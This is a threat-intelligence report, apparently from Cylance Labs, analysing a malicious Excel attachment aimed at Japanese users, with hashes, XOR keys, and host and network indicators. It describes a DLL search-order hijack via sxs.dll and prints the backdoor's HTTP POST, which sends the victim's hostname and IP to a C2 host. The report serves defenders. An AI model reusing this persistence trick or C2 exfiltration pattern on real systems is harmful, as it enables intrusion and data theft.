Over the past few weeks Cylance Labs identified a surge in targeted documents against Japanese users. These documents coincide perfectly with world news concerning recent escalating tensions between China and Japan over the disputed Senkaku/Diaoyu Islands. These files are being sent regularly to a number of different users and industries using a variety of old and new exploits. China often denies any involvement in ongoing cyber attacks; however, the ongoing dispute between the two countries has raised nationalistic pride on both sides and put the countries on edge.
We have decided to share some of our findings in hopes of empowering defenders to protect their systems.
Meta Information:
Filename: keikaku-201302.xls -> Translates as Plan-201302 MD5: 7ec89be945add54aa67009dbc12a9260 SHA1: 1434a04f10c2162eab82703ef79e407dcbf5c30f SHA256: 6d7b9f15cd8e3e75295e1c5ca46a3610e0e22b45d7bea18444b1f54e127131d0 FileSize: 172,564 Bytes
Document Structure Summary Information:
Operating System Version 5.1 Size: 12713 Bytes 'Root Entry' (root) 8192 bytes {00020820-0000-0000-C000-000000000046} '\x01CompObj' (stream) 112 bytes '\x05DocumentSummaryInformation' (stream) 72 bytes 'Workbook' (stream) 4733 bytes '_VBA_PROJECT_CUR' (storage) 'PROJECT' (stream) 424 bytes 'PROJECTwm' (stream) 62 bytes 'VBA' (storage) 'Sheet1' (stream) 1066 bytes 'ThisWorkbook' (stream) 985 bytes '_VBA_PROJECT' (stream) 2933 bytes 'dir' (stream) 804 bytes 'encryption' (stream) 1522 bytes
File Details:
The file was targeted at Japanese users and exploits CVE-2012-0158, which was first used in the wild in April of 2012. The binary is encoded within the document with a single byte XOR key of 0x12 and skips the first byte of the binary (0x4D). An empty dummy document is also decoded and loaded upon successful exploitation and is stored at file offset 0x23C14 with the single byte XOR key of 0x97.
Dropper Details:
FileSize: 153,600 Bytes MD5: C266FAA587136328C939D2BB25EA7D42
The interesting facet of this particular sample is the decoded binary does nothing but create the file C:\Program Files\Internet Explorer\sxs.dll. The sxs.dll file is stored within the dropper as a resource named DATA with a Chinese CodePage (2052). The backdoor takes advantage of a vulnerability known as DLL search order hijacking. Internet Explorer when executed will first load the sxs.dll file in the local directory as opposed to the legitimate sxs.dll file in the system32 directory, %systemroot%\system32\. So any file named sxs.dll in the same directory as the iexplore.exe binary will most likely be malicious in any future encounters. Investigators should add this to the list of known DLL search order hijacking locations including: %systemroot%\ntshrui.dll, %systemroot%\fxsst.dll, %systemroot%\linkinfo.dll, and %systemroot%\midimap.dll.
Backdoor Details:
FileSize: 78,336 Bytes MD5: 653C8AEAE41F0A008E3D31C13D92A038
When Internet Explorer is executed the file will be loaded into the processs address space and create a mutex of myhorse_ie_001. The backdoor exports a function named fuc_trend.
NETWORK-BASED INDICATORS:
- The malware will make DNS requests for www.dotaplayers.com which appears to be a legitimate small website hosting company.
- The malware communicates over TCP port 80 using HTTP requests similar to the ones below.
POST /jd/upload.aspx?filepath=info&filename={Hostname}_{IP}.jpg HTTP/1.1
Host: www.dotaplayers.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language: en-us
Content-Type: multipart/form-data
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cache-Control: no-cache
User-Agent: MyAgent
Content-Length: 3112
Where {Hostname} is the hostname of the victim system and {IP} is IP address of the system. The backdoor will also use the User-Agent mydownload when downloading files from the C2 server.
HOST-BASED INDICATORS:
- The malware will create the file %temp%\tmp.dat and gather basic system information before encoding and sending it in the body of the POST request.
- The malware may also create the following files in the %temp% directory.
- cmd{decimal value}.dat
- msuc.dat
- order.dat
- tmpxor.dat
HostName: {Hostname}
IP: {IP}
Proxy: (null)
User: Administrator
SystemDir: C:\WINDOWS\system32
OS Language Version: 437
System Version: 5.1 Service Pack 3 (Build 2600)
Process:
ID: 4 (?)
ID: 472 (\SystemRoot\System32\smss.exe)
ID: 888 (\??\C:\WINDOWS\system32\winlogon.exe)
ID: 932 (C:\WINDOWS\system32\services.exe)
ID: 944 (C:\WINDOWS\system32\lsass.exe)
ID: 1100 (C:\WINDOWS\system32\svchost.exe)
ID: 1364 (C:\WINDOWS\System32\svchost.exe)
ID: 1888 (C:\WINDOWS\Explorer.EXE)
ID: 188 (C:\WINDOWS\system32\spoolsv.exe)
ID: 400 (C:\Program Files\Parallels\Parallels Tools\Services\coherence.exe)
ID: 424 (C:\Program Files\Parallels\Parallels Tools\Services\prl_tools_service.exe)
ID: 536 (C:\Program Files\Parallels\Parallels Tools\Services\prl_tools.exe)
ID: 596 (C:\WINDOWS\system32\svchost.exe)
ID: 1572 (C:\Program Files\Parallels\Parallels Tools\prl_cc.exe)
ID: 1592 (C:\WINDOWS\system32\ctfmon.exe)
ID: 1656 (C:\WINDOWS\system32\wscntfy.exe)
ID: 3284 (C:\Program Files\Sandboxie\SbieSvc.exe)
ID: 2052 (C:\Program Files\Sandboxie\SbieCtrl.exe)
ID: 2744 (C:\WINDOWS\system32\cmd.exe)
ID: 868 (C:\Python26\python.exe)
ID: 3560 (C:\Program Files\Internet Explorer\iexplore.exe)
ID: 1688 (C:\Program Files\Internet Explorer\iexplore.exe)
Figure 1: Example contents of "tmp.dat" Data like that shown in the figure above is first converted to Unicode and then encoded with XOR against the key *&~^%@0hh8979 before being sent to the C2 server.
Conclusion
The network traffic for this specific trojan can readily be identified from the static User-Agents used within the code including MyAgent and mydownload. While these attacks appear to be limited in scope, this novel persistence method will undoubtedly be applied in future malicious endeavors by the attackers. Investigators should diligently investigate any files named sxs.dll in the same directory as Internet Explorer.
Users are encouraged to be wary of any attachments received using a .doc or.xls extension. Modern versions of Microsoft Office (2007+) will by default save documents using the newer Office Open XML format with a .docx or .xlsx extension. Cylance Labs has yet to identify a malicious office document in these attacks, which takes advantage of the OOXML format.
